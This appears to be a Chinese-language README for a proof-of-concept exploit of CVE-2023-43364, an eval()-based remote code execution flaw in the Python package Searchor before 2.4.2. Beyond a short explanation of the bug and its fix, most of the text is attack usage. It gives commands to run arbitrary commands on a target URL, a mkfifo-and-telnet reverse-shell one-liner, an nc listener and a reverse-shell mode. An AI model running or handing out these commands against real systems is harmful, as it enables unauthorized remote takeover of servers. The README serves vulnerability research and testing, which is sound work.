通过 Searchor(< 2.4.2)中对
eval()的不安全使用导致的远程代码执行(RCE)
本项目演示了 CVE-2023-43364 的漏洞利用,这是一个影响 Python 包 Searchor(< 2.4.2)的远程代码执行(RCE)漏洞。
该问题源于对用户可控输入不安全地使用 eval(),攻击者可借此注入并执行任意 Python 代码。
该漏洞已通过移除不安全的 eval() 用法得到修复,如官方补丁所示:
更多技术细节与安全公告:
该概念验证提供了多种执行方式,包括命令执行、测试验证和反弹 Shell。
执行一条简单命令(id)以验证代码执行:
python3 CVE-2023-43364.py <URL> --test
执行自定义命令 在目标服务器上运行任意命令:
python3 CVE-2023-43364.py <URL> -a "whoami"
示例:
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"
反弹 Shell 在你的机器上启动监听器:
nc -lvnp 4444
运行漏洞利用:
python3 CVE-2023-43364.py <URL> <LHOST>
本项目仅供:
作者不对因使用本工具而造成的任何误用或损害负责。
请仅在受控环境中或在你拥有明确测试授权的系统上使用此漏洞利用。